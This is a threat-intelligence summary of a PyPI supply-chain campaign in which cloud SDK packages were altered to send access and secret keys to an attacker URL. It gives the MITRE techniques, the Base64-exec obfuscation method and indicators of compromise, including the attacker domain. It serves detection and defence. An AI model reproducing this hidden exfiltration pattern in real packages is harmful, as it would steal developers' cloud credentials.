Phylum reports a targeted PyPI campaign where packages purporting to be cloud provider SDKs were modified to exfiltrate credentials. Attackers obfuscated a POST request and preserved the original functionality of the packages to avoid detection while sending keys to an attacker-controlled URL. #PyPI #aliyun-sdk-requests #TencentCloud #AlibabaCloud #enumerate-iam #coinexchanged #weiwang3056
Keypoints
- Attackers targeted widely-used cloud provider SDKs on PyPI to steal access and secret keys.
- They inserted a small malicious modification into legitimate code to exfiltrate credentials via a crafted POST request.
- The POST URL is Base64-encoded to evade basic detection, representing a simple obfuscation tactic.
- The campaign has identified five PyPI packages that follow the same exfiltration pattern.
- The attackers aimed to preserve the original package functionality so developers would not notice the malicious change.
- Maintainer activity and Whois data show multiple contributors and dates surrounding the packages in this campaign.
MITRE Techniques
- [T1195] Supply Chain Attack – The attacker began by identifying a small set of widely-utilized cloud provider SDKs on account of their intrinsic capability of handling sensitive cloud credentials. ‘the attacker began by identifying a small set of widely-utilized cloud provider SDKs on account of their intrinsic capability of handling sensitive cloud credentials.’
- [T1059.006] Python – The obfuscated POST request is executed via Python code using exec() on a Base64-encoded string that is decoded at runtime. ‘…obfuscate the entire POST request by calling exec() on a large Base64-encoded string that’s dynamically decoded at runtime.’
- [T1027] Obfuscated/Compressed Data – The remote URL is Base64-encoded as a basic obfuscation attempt. ‘The remote URL was Base64-encoded in a rudimentary but clear obfuscation attempt.’
- [T1041] Exfiltration Over C2 Channel – Exfiltration of cloud credentials to an attacker-controlled remote URL via HTTP POST. ‘exfiltrate those access and secret keys to an attacker-controlled remote URL.’
- [T1195] Supply Chain Attack – Publication of multiple malicious PyPI packages that mimic legitimate ones to harvest credentials. ‘So far, we’ve identified five packages attempting to exfiltrate secrets in this manner to the same remote URL.’
Indicators of Compromise
- [Base64-Encoded Strings] Context – aHR0cHM6Ly9hcGkuYWxpeXVuLXNkay1yZXF1ZXN0cy54eXovYWxpeXVu, aHR0cHM6Ly9hcGkuYWxpeXVuLXNkay1yZXF1ZXN0cy54eXovdGVuY2VudA
- [Decoded URLs] Context – https://api[.]aliyun-sdk-requests[.]xyz/tencent, https://api[.]aliyun-sdk-requests[.]xyz/aliyun
- [File] Path to modified files – common/credential.py, client.py, and 3 more files
Read more: https://blog.phylum.io/cloud-provider-credentials-targeted-in-new-pypi-malware-campaign/